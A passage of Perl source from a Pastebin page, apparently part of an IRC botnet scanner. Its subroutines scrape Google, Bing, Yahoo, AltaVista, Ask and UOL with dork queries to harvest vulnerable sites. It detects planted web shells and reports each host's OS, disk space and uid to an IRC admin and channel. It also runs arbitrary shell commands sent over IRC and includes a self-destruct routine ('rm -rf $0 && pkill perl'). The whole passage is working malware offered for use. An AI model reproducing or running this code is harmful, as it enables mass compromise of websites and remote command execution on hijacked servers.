  689. &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln5."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  690. &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln5."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  691. }
  692. if ($check5 =~ /JANCOK- exploit/i) {
  693. if ($check5 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  694. if ($check5 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
  695. if ($check5 =~ m/uid=(.*?)gid=/) {$uid = $1;}
  696. &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln6."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  697. &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln6."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  698. }
  699. }
  700. }
  701. }
  702. }
  703. #########################################
  704.  
  705. sub search_engine() {
  706. my (@total,@clean);
  707. my $chan = $_[0];
  708. my $bug = $_[1];
  709. my $dork = $_[2];
  710. my $engine = $_[3];
  711. my $logo = $_[4];
  712. if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); }
  713. if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); }
  714. if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); }
  715. if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); }
  716. if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); }
  717. if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); }
  718. if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); }
  719. @clean = clean(@total);
  720. &msg("$chan","$logo15(9@2$engine15) Total:14 (".scalar(@total).") Clean:14 (".scalar(@clean).")");
  721. return @clean;
  722. }
  723.  
  724. #########################################
  725.  
  726. sub isFound() {
  727. my $status = 0;
  728. my $link = $_[0];
  729. my $reqexp = $_[1];
  730. my $res = &get_content($link);
  731. if ($res =~ /$reqexp/) { $status = 1 }
  732. return $status;
  733. }
  734.  
  735. sub get_content() {
  736. my $url = $_[0];
  737. my $ua = LWP::UserAgent->new(agent => $uagent);
  738. $ua->timeout(7);
  739. my $req = HTTP::Request->new(GET => $url);
  740. my $res = $ua->request($req);
  741. return $res->content;
  742. }
  743. ######################################### SEARCH ENGINE gibla
  744. sub google() {
  745. my @list;
  746. my $key = $_[0];
  747. for (my $i=0; $i<=1000; $i+=100){
  748. my $search = ("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$i);
  749. my $res = search_engine_query($search);
  750. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
  751. my $link = $1;
  752. if ($link !~ /google/){
  753. my @grep = links($link);
  754. push(@list,@grep);
  755. }
  756. }
  757. }
  758. return @list;
  759. }
  760.  
  761. sub alltheweb() {
  762. my @list;
  763. my $key = $_[0];
  764. for (my $i=0; $i<=1000; $i+=100) {
  765. my $search = ("http://us.yhs4.search.yahoo.com/yhs/search?fr=alltheweb&cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
  766. my $res = search_engine_query($search);
  767. while ($res =~ m/\*\*http%3a\/\/(.+?)\">/g) {
  768. my $link = $1;
  769. if ($link !~ /bingj|yahoo/) {
  770. $link =~ s/ //g;
  771. $link =~ s/%3f/\?/g;
  772. my @grep = links($link);
  773. push(@list,@grep);
  774. }
  775. }
  776. }
  777. return @list;
  778. }
  779.  
  780. sub uol() {
  781. my @list;
  782. my $key = $_[0];
  783. for (my $i=1; $i<=1000; $i+=10) {
  784. my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i);
  785. my $res = search_engine_query($search);
  786. while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
  787. my $link = $1;
  788. if ($link !~ /busca|uol|yahoo/) {
  789. my @grep = links($link);
  790. push(@list,@grep);
  791. }
  792. }
  793. }
  794. return @list;
  795. }
  796.  
  797. sub bing() {
  798. my @list;
  799. my $key = $_[0];
  800. for (my $i=1; $i<=1000; $i+=10) {
  801. my $search = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$i."&FORM=PERE");
  802. my $res = search_engine_query($search);
  803. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
  804. my $link = $1;
  805. if ($link !~ /msn|live|bing/) {
  806. my @grep = links($link);
  807. push(@list,@grep);
  808. }
  809. }
  810. }
  811. return @list;
  812. }
  813.  
  814. sub altavista() {
  815. my @list;
  816. my $key = $_[0];
  817. for (my $i=1; $i<=1000; $i+=10){
  818. my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$i);
  819. my $res = search_engine_query($search);
  820. while ($res =~ m/<span class=ngrn>(.+?)\//g) {
  821. my $link = $1;
  822. if ($link !~ /altavista/){
  823. $link =~ s/<//g;
  824. $link =~ s/ //g;
  825. my @grep = links($link);
  826. push(@list,@grep);
  827. }
  828. }
  829. }
  830. return @list;
  831. }
  832.  
  833. sub ask() {
  834. my @list;
  835. my $key = $_[0];
  836. for (my $i=0; $i<=1000; $i+=10) {
  837. my $search = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i);
  838. my $res = search_engine_query($search);
  839. while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
  840. my $link = $1;
  841. if ($link !~ /ask\.com/){
  842. my @grep = links($link);
  843. push(@list,@grep);
  844. }
  845. }
  846. }
  847. return @list;
  848. }
  849.  
  850. sub yahoo() {
  851. my @list;
  852. my $key = $_[0];
  853. for (my $i=1; $i<=500; $i+=1) {
  854. my $search = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i);
  855. my $res = search_engine_query($search);
  856. while ($res =~ m/26u=(.*?)%26w=/g) {
  857. my $link = $1;
  858. if ($link!~ /yahoo/){
  859. my @grep = links($link);
  860. push(@list,@grep);
  861. }
  862. }
  863. }
  864. return @list;
  865. }
  866.  
  867. #########################################
  868. sub clean() {
  869. my @cln = ();
  870. my %visit = ();
  871. foreach my $element (@_) {
  872. $element =~ s/\/+/\//g;
  873. next if $visit{$element}++;
  874. push @cln, $element;
  875. }
  876. return @cln;
  877. }
  878.  
  879. sub key() {
  880. my $dork = $_[0];
  881. $dork =~ s/ /\+/g;
  882. $dork =~ s/:/\%3A/g;
  883. $dork =~ s/\//\%2F/g;
  884. $dork =~ s/\?/\%3F/g;
  885. $dork =~ s/&/\%26/g;
  886. $dork =~ s/\"/\%22/g;
  887. $dork =~ s/,/\%2C/g;
  888. $dork =~ s/\\/\%5C/g;
  889. $dork =~ s/@/\%40/g;
  890. $dork =~ s/\[/\%5B/g;
  891. $dork =~ s/\]/\%5D/g;
  892. $dork =~ s/\?/\%3F/g;
  893. $dork =~ s/\=/\%3D/g;
  894. $dork =~ s/\|/\%7C/g;
  895. return $dork;
  896. }
  897.  
  898. sub links() {
  899. my @list;
  900. my $link = $_[0];
  901. my $host = $_[0];
  902. my $hdir = $_[0];
  903. $hdir =~ s/(.*)\/[^\/]*$/$1/;
  904. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  905. $host .= "/";
  906. $link .= "/";
  907. $hdir .= "/";
  908. $host =~ s/\/\//\//g;
  909. $hdir =~ s/\/\//\//g;
  910. $link =~ s/\/\//\//g;
  911. push(@list,$link,$host,$hdir);
  912. return @list;
  913. }
  914.  
  915. sub search_engine_query($) {
  916. my $url = $_[0];
  917. $url =~ s/http:\/\///;
  918. my $host = $url;
  919. my $query = $url;
  920. my $page = "";
  921. $host =~ s/href=\"?http:\/\///;
  922. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  923. $query =~ s/$host//;
  924. if ($query eq "") { $query = "/"; }
  925. eval {
  926. my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
  927. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
  928. my @pages = <$sock>;
  929. $page = "@pages";
  930. close($sock);
  931. };
  932. return $page;
  933. }
  934.  
  935. #########################################
  936.  
  937. sub shell() {
  938. my $path = $_[0];
  939. my $cmd = $_[1];
  940. if ($cmd =~ /cd (.*)/) {
  941. chdir("$1") || &msg("$path","4No such file or directory");
  942. return;
  943. }
  944. elsif ($pid = fork) { waitpid($pid, 0); }
  945. else { if (fork) { exit; } else {
  946. my @output = `$cmd 2>&1 3>&1`;
  947. my $c = 0;
  948. foreach my $output (@output) {
  949. $c++;
  950. chop $output;
  951. &msg("$path","$output");
  952. if ($c == 5) { $c = 0; sleep 2; }
  953. }
  954. exit;
  955. }}
  956. }
  957.  
  958. sub isAdmin() {
  959. my $status = 0;
  960. my $nick = $_[0];
  961. if ($nick eq $admin) { $status = 1; }
  962. return $status;
  963. }
  964.  
  965. sub msg() {
  966. return unless $#_ == 1;
  967. sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
  968. }
  969.  
  970. sub SIGN() {
  971. if (($powered !~ /t/)||($mail !~ /bot/)) {
  972. print "\nLAMER DETECTED FVCK YOU. YOU NOT HACKER. U JUST SCRIPT KIDDIES\n\n";
  973. exec("rm -rf $0 && pkill perl");
  974. }
  975. }
  976.  
  977. sub nick() {
  978. return unless $#_ == 0;
  979. sendraw("NICK $_[0]");
  980. }
  981.  
  982. sub notice() {
  983. return unless $#_ == 1;
  984. sendraw("NOTICE $_[0] :$_[1]");
  985. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!